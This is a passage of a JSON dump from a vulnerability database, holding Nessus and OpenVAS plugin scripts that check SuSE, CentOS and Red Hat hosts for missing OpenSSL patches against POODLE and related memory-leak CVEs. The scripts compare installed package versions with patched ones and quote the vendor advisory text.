2015/01/28 19:00:58 $\");\n\n script_cve_id(\"CVE-2014-3566\", \"CVE-2014-3567\", \"CVE-2014-3568\");\n\n script_name(english:\"SuSE 11.3 Security Update : OpenSSL (SAT Patch Number 9915)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This OpenSSL update fixes the following issues :\n\n - Session Ticket Memory Leak. (CVE-2014-3567)\n\n - Build option no-ssl3 is incomplete. (CVE-2014-3568)\n\n - Add support for TLS_FALLBACK_SCSV to mitigate\n CVE-2014-3566 (POODLE)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=892403\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=901223\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=901277\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-3566.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-3567.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-3568.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 9915.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libopenssl0_9_8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libopenssl0_9_8-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libopenssl0_9_8-hmac\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libopenssl0_9_8-hmac-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:openssl-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"libopenssl0_9_8-0.9.8j-0.66.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"openssl-0.9.8j-0.66.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"libopenssl0_9_8-0.9.8j-0.66.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"libopenssl0_9_8-32bit-0.9.8j-0.66.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"openssl-0.9.8j-0.66.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"libopenssl0_9_8-0.9.8j-0.66.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"libopenssl0_9_8-hmac-0.9.8j-0.66.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"openssl-0.9.8j-0.66.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"openssl-doc-0.9.8j-0.66.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"libopenssl0_9_8-32bit-0.9.8j-0.66.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"libopenssl0_9_8-hmac-32bit-0.9.8j-0.66.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"libopenssl0_9_8-32bit-0.9.8j-0.66.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"libopenssl0_9_8-hmac-32bit-0.9.8j-0.66.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:19:55", "references": ["https://www.openssl.org/~bodo/ssl-poodle.pdf", "http://www.nessus.org/u?4b0ea329", "https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00", "https://www.imperialviolet.org/2014/10/14/poodle.html", "http://www.nessus.org/u?d5a8460d"], "pluginID": "78516", "description": "Updated OpenSSL packages that contain a backported patch to mitigate\nthe CVE-2014-3566 issue known as SSLv3 Padding Oracle On Downgraded\nLegacy Encryption Vulnerability (POODLE), and fixed two security\nissues that are now available for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),\nTransport Layer Security (TLS), and Datagram Transport Layer Security\n(DTLS) protocols, as well as a full-strength, general purpose\ncryptography library.\n\nThis update adds support for the TLS Fallback Signaling Cipher Suite\nValue (TLS_FALLBACK_SCSV), which can be used to prevent protocol\ndowngrade attacks against applications which re-connect using a lower\nSSL/TLS protocol version when the initial connection indicating the\nhighest supported protocol version fails.\n\nThis can prevent a forceful downgrade of the communication to SSL 3.0.\nThe SSL 3.0 protocol was found to be vulnerable to the padding oracle\nattack when using block cipher suites in cipher block chaining (CBC)\nmode. This issue is identified as CVE-2014-3566 and also known under\nthe alias POODLE. This SSL 3.0 protocol flaw will not be addressed in\na future update; it is recommended that users configure their\napplications to require at least TLS protocol version 1.0 for secure\ncommunication.\n\nFor additional information about this flaw, see the Knowledgebase\narticle at https://access.redhat.com/articles/1232123\n\nA memory leak flaw was found in the way OpenSSL parsed the DTLS Secure\nReal-time Transport Protocol (SRTP) extension data. A remote attacker\ncould send multiple specially crafted handshake messages to exhaust\nall available memory of an SSL/TLS or DTLS server. (CVE-2014-3513)\n\nA memory leak flaw was found in the way an OpenSSL handled failed\nsession ticket integrity checks. A remote attacker could exhaust all\navailable memory of an SSL/TLS or DTLS server by sending a large\nnumber of invalid session tickets to that server. (CVE-2014-3567)\n\nAll OpenSSL users are advised to upgrade to these updated packages,\nwhich contain backported patches to mitigate the CVE-2014-3566 issue\nand correct the CVE-2014-3513 and CVE-2014-3567 issues. For the update\nto take effect, all services linked to the OpenSSL library (such as\nhttpd and other SSL-enabled services) must be restarted or the system\nrebooted.", "edition": 6, "reporter": "Tenable", "published": "2014-10-17T00:00:00", "title": "CentOS 6 / 7 : openssl (CESA-2014:1652)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566", "CVE-2014-3513", "CVE-2014-3567"], "modified": "2018-07-02T00:00:00", "cpe": ["p-cpe:/a:centos:centos:openssl-perl", "p-cpe:/a:centos:centos:openssl-devel", "cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:openssl-libs", "cpe:/o:centos:centos:7", "p-cpe:/a:centos:centos:openssl", "p-cpe:/a:centos:centos:openssl-static"], "id": "CENTOS_RHSA-2014-1652.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=78516", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1652 and \n# CentOS Errata and Security Advisory 2014:1652 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78516);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2018/07/02 18:48:53\");\n\n script_cve_id(\"CVE-2014-3513\", \"CVE-2014-3566\", \"CVE-2014-3567\");\n script_bugtraq_id(70574, 70584, 70586);\n script_xref(name:\"CERT\", value:\"577193\");\n script_xref(name:\"RHSA\", value:\"2014:1652\");\n\n script_name(english:\"CentOS 6 / 7 : openssl (CESA-2014:1652)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated OpenSSL packages that contain a backported patch to mitigate\nthe CVE-2014-3566 issue known as SSLv3 Padding Oracle On Downgraded\nLegacy Encryption Vulnerability (POODLE), and fixed two security\nissues that are now available for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),\nTransport Layer Security (TLS), and Datagram Transport Layer Security\n(DTLS) protocols, as well as a full-strength, general purpose\ncryptography library.\n\nThis update adds support for the TLS Fallback Signaling Cipher Suite\nValue (TLS_FALLBACK_SCSV), which can be used to prevent protocol\ndowngrade attacks against applications which re-connect using a lower\nSSL/TLS protocol version when the initial connection indicating the\nhighest supported protocol version fails.\n\nThis can prevent a forceful downgrade of the communication to SSL 3.0.\nThe SSL 3.0 protocol was found to be vulnerable to the padding oracle\nattack when using block cipher suites in cipher block chaining (CBC)\nmode. This issue is identified as CVE-2014-3566 and also known under\nthe alias POODLE. This SSL 3.0 protocol flaw will not be addressed in\na future update; it is recommended that users configure their\napplications to require at least TLS protocol version 1.0 for secure\ncommunication.\n\nFor additional information about this flaw, see the Knowledgebase\narticle at https://access.redhat.com/articles/1232123\n\nA memory leak flaw was found in the way OpenSSL parsed the DTLS Secure\nReal-time Transport Protocol (SRTP) extension data. A remote attacker\ncould send multiple specially crafted handshake messages to exhaust\nall available memory of an SSL/TLS or DTLS server. (CVE-2014-3513)\n\nA memory leak flaw was found in the way an OpenSSL handled failed\nsession ticket integrity checks. A remote attacker could exhaust all\navailable memory of an SSL/TLS or DTLS server by sending a large\nnumber of invalid session tickets to that server. (CVE-2014-3567)\n\nAll OpenSSL users are advised to upgrade to these updated packages,\nwhich contain backported patches to mitigate the CVE-2014-3566 issue\nand correct the CVE-2014-3513 and CVE-2014-3567 issues. For the update\nto take effect, all services linked to the OpenSSL library (such as\nhttpd and other SSL-enabled services) must be restarted or the system\nrebooted.\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2014-October/020695.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d5a8460d\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2014-October/020697.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4b0ea329\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.imperialviolet.org/2014/10/14/poodle.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openssl.org/~bodo/ssl-poodle.pdf\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssl packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssl-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:openssl-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\n\npackages = make_list(\"openssl\", \"openssl-devel\", \"openssl-perl\", \"openssl-static\");\nadvisory_version = \"1.0.1e-30.el6_5.2\";\nbuggy_branch = \"1.0.1e-30.el6\\.([89]|\\d{2,})\\|\";\nforeach currpackage (packages)\n{\n rpm_regex = currpackage + \"-\" + buggy_branch;\n advisory_reference = currpackage + \"-\" + advisory_version;\n if (! rpm_exists(release:\"CentOS-6\", rpm:rpm_regex) && rpm_check(release:\"CentOS-6\", reference:advisory_reference)) flag++;\n}\n\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"openssl-1.0.1e-34.el7_0.6\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"openssl-devel-1.0.1e-34.el7_0.6\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"openssl-libs-1.0.1e-34.el7_0.6\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"openssl-perl-1.0.1e-34.el7_0.6\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"openssl-static-1.0.1e-34.el7_0.6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-09-01T23:53:21", "references": ["http://lists.centos.org/pipermail/centos-announce/2014-October/020695.html", "2014:1652"], "pluginID": "1361412562310882062", "description": "Check the version of openssl", "edition": 5, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-10-17T00:00:00", "title": "CentOS Update for openssl CESA-2014:1652 centos7 ", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566", "CVE-2014-3513", "CVE-2014-3567"], "modified": "2017-08-24T00:00:00", "id": "OPENVAS:1361412562310882062", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882062", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for openssl CESA-2014:1652 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882062\");\n script_version(\"$Revision: 7000 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-08-24 13:51:46 +0200 (Thu, 24 Aug 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-17 05:58:44 +0200 (Fri, 17 Oct 2014)\");\n script_cve_id(\"CVE-2014-3513\", \"CVE-2014-3567\", \"CVE-2014-3566\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_name(\"CentOS Update for openssl CESA-2014:1652 centos7 \");\n\n script_tag(name: \"summary\", value: \"Check the version of openssl\");\n\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the\nhelp of detect NVT and check if the version is vulnerable or not.\");\n\n script_tag(name: \"insight\", value: \"OpenSSL is a toolkit that implements the\nSecure Sockets Layer (SSL), Transport Layer Security (TLS), and Datagram Transport\nLayer Security (DTLS) protocols, as well as a full-strength, general purpose\ncryptography library.\n\nThis update adds support for the TLS Fallback Signaling Cipher Suite Value\n(TLS_FALLBACK_SCSV), which can be used to prevent protocol downgrade\nattacks against applications which re-connect using a lower SSL/TLS\nprotocol version when the initial connection indicating the highest\nsupported protocol version fails.\n\nThis can prevent a forceful downgrade of the communication to SSL 3.0.\nThe SSL 3.0 protocol was found to be vulnerable to the padding oracle\nattack when using block cipher suites in cipher block chaining (CBC) mode.\nThis issue is identified as CVE-2014-3566, and also known under the alias\nPOODLE. This SSL 3.0 protocol flaw will not be addressed in a future\nupdate it is recommended that users configure their applications to\nrequire at least TLS protocol version 1.0 for secure communication.\n\nFor additional information about this flaw, see the Knowledgebase article\nat https://access.redhat.com/articles/1232123\n\nA memory leak flaw was found in the way OpenSSL parsed the DTLS Secure\nReal-time Transport Protocol (SRTP) extension data. A remote attacker could\nsend multiple specially crafted handshake messages to exhaust all available\nmemory of an SSL/TLS or DTLS server. (CVE-2014-3513)\n\nA memory leak flaw was found in the way an OpenSSL handled failed session\nticket integrity checks. A remote attacker could exhaust all available\nmemory of an SSL/TLS or DTLS server by sending a large number of invalid\nsession tickets to that server. (CVE-2014-3567)\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain backported patches to mitigate the CVE-2014-3566 issue and correct\nthe CVE-2014-3513 and CVE-2014-3567 issues. For the update to take effect,\nall services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\n\");\n script_tag(name: \"affected\", value: \"openssl on CentOS 7\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"CESA\", value: \"2014:1652\");\n script_xref(name: \"URL\" , value: \"http://lists.centos.org/pipermail/centos-announce/2014-October/020695.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1e~34.el7_0.6\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~1.0.1e~34.el7_0.6\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-libs\", rpm:\"openssl-libs~1.0.1e~34.el7_0.6\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-perl\", rpm:\"openssl-perl~1.0.1e~34.el7_0.6\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-static\", rpm:\"openssl-static~1.0.1e~34.el7_0.6\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-11-19T13:02:09", "references": ["2014:1361_1"], "pluginID": "1361412562310850800", "description": "The remote host is missing an update for the ", "edition": 8, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-10-13T00:00:00", "title": "SuSE Update for OpenSSL SUSE-SU-2014:1361-1 (OpenSSL)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566", "CVE-2014-3567", "CVE-2014-3568"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310850800", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850800", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2014_1361_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for OpenSSL SUSE-SU-2014:1361-1 (OpenSSL)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850800\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-13 18:35:01 +0530 (Tue, 13 Oct 2015)\");\n script_cve_id(\"CVE-2014-3566\", \"CVE-2014-3567\", \"CVE-2014-3568\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for OpenSSL SUSE-SU-2014:1361-1 (OpenSSL)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'OpenSSL'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"This OpenSSL update fixes the following issues:\n\n * Session Ticket Memory Leak (CVE-2014-3567)\n\n * Build option no-ssl3 is incomplete (CVE-2014-3568)\n\n * Add support for TLS_FALLBACK_SCSV to mitigate CVE-2014-3566 (POODLE)\n\n Security Issues:\n\n * CVE-2014-3567\n\n * CVE-2014-3566\n\n * CVE-2014-3568\n\n Indications:\n\n Everybody should update.\");\n script_tag(name:\"affected\", value:\"OpenSSL on SUSE Linux Enterprise Server 11 SP3\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"SUSE-SU\", value:\"2014:1361_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLES11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"SLES11.0SP3\")\n{\n\n if ((res = isrpmvuln(pkg:\"libopenssl0_9_8\", rpm:\"libopenssl0_9_8~0.9.8j~0.66.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl0_9_8-hmac\", rpm:\"libopenssl0_9_8-hmac~0.9.8j~0.66.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8j~0.66.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~0.9.8j~0.66.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl0_9_8-32bit\", rpm:\"libopenssl0_9_8-32bit~0.9.8j~0.66.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl0_9_8-hmac-32bit\", rpm:\"libopenssl0_9_8-hmac-32bit~0.9.8j~0.66.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl0_9_8-x86\", rpm:\"libopenssl0_9_8-x86~0.9.8j~0.66.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-11-19T13:03:55", "references": ["https://www.redhat.com/archives/rhsa-announce/2014-October/msg00030.html", "2014:1652-01", "https://access.redhat.com/articles/1232123"], "pluginID": "1361412562310871274", "description": "The remote host is missing an update for the ", "edition": 7, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-10-17T00:00:00", "title": "RedHat Update for openssl RHSA-2014:1652-01", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566", "CVE-2014-3513", "CVE-2014-3567"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310871274", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871274", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for openssl RHSA-2014:1652-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as 